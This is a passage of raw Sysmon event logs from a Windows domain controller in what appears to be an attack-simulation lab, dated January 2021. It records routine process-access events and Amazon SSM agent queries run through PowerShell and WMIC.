10341000x80000000000000002322Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:21.938{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8E5D-6005-6B00-00000000A301}3940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002321Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:21.938{59A5CD1D-8E5B-6005-5500-00000000A301}37483704C:\Program Files\Amazon\SSM\ssm-agent-worker.exe{59A5CD1D-8E5D-6005-6B00-00000000A301}3940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Amazon\SSM\ssm-agent-worker.exe+5d9ee 154100x80000000000000002320Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:21.938{59A5CD1D-8E5D-6005-6B00-00000000A301}3940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell "Get-ItemProperty -Path 'HKLM:\SOFTWARE\Amazon\PVDriver'" "| Select-Object" "Name, Version" "| ConvertTo-Json -Depth 3"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{59A5CD1D-8E5B-6005-5500-00000000A301}3748C:\Program Files\Amazon\SSM\ssm-agent-worker.exe"C:\Program Files\Amazon\SSM\ssm-agent-worker.exe" 10341000x80000000000000002319Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:21.903{59A5CD1D-8E44-6005-0B00-00000000A301}8563980C:\Windows\system32\lsass.exe{59A5CD1D-8E5D-6005-6A00-00000000A301}3864C:\Windows\System32\Wbem\wmic.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002318Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:21.903{59A5CD1D-8E44-6005-0B00-00000000A301}8563980C:\Windows\system32\lsass.exe{59A5CD1D-8E5D-6005-6A00-00000000A301}3864C:\Windows\System32\Wbem\wmic.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002317Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:21.900{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E5D-6005-6A00-00000000A301}3864C:\Windows\System32\Wbem\wmic.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002316Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:21.893{59A5CD1D-8E5B-6005-5B00-00000000A301}39363912C:\Windows\system32\conhost.exe{59A5CD1D-8E5D-6005-6A00-00000000A301}3864C:\Windows\System32\Wbem\wmic.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002315Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:21.891{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002314Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:21.891{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002313Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:21.891{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002312Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:21.891{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002311Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:21.891{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002310Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:21.891{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002309Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:21.891{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002308Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:21.891{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002307Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:21.891{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002306Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:21.890{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8E5D-6005-6A00-00000000A301}3864C:\Windows\System32\Wbem\wmic.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002305Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:21.890{59A5CD1D-8E5B-6005-5500-00000000A301}37483704C:\Program Files\Amazon\SSM\ssm-agent-worker.exe{59A5CD1D-8E5D-6005-6A00-00000000A301}3864C:\Windows\System32\Wbem\wmic.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Amazon\SSM\ssm-agent-worker.exe+5d9ee 154100x80000000000000002304Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:21.890{59A5CD1D-8E5D-6005-6A00-00000000A301}3864C:\Windows\System32\wbem\WMIC.exe10.0.14393.0 (rs1_release.160715-1616)WMI Commandline UtilityMicrosoft® Windows® Operating SystemMicrosoft Corporationwmic.exewmic OS get OperatingSystemSKU /format:listC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=2CEE7F1AD77D8817E0F043E5E5ED1C83,SHA256=6679EA8FBEB539B5852CE8838420471FED0600F5050F3370DBB355DAC76BF072,IMPHASH=1B1A3F43BF37B5BFE60751F2EE2F326E{59A5CD1D-8E5B-6005-5500-00000000A301}3748C:\Program Files\Amazon\SSM\ssm-agent-worker.exe"C:\Program Files\Amazon\SSM\ssm-agent-worker.exe" 10341000x80000000000000002303Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:21.548{59A5CD1D-8E44-6005-0B00-00000000A301}8563980C:\Windows\system32\lsass.exe{59A5CD1D-8E5D-6005-6800-00000000A301}3548C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002302Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:21.548{59A5CD1D-8E44-6005-0B00-00000000A301}8563980C:\Windows\system32\lsass.exe{59A5CD1D-8E5D-6005-6800-00000000A301}3548C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000002301Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:21.486{59A5CD1D-8E5D-6005-6800-00000000A301}3548C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Temp\__PSScriptPolicyTest_33l1lgil.qq4.ps12021-01-18 13:34:21.486 10341000x80000000000000002300Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:21.467{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E5D-6005-6800-00000000A301}3548C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002299Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:21.457{59A5CD1D-8E5B-6005-5B00-00000000A301}39363912C:\Windows\system32\conhost.exe{59A5CD1D-8E5D-6005-6800-00000000A301}3548C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002298Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:21.456{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002297Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:21.456{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002296Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:21.456{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002295Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:21.456{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002294Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 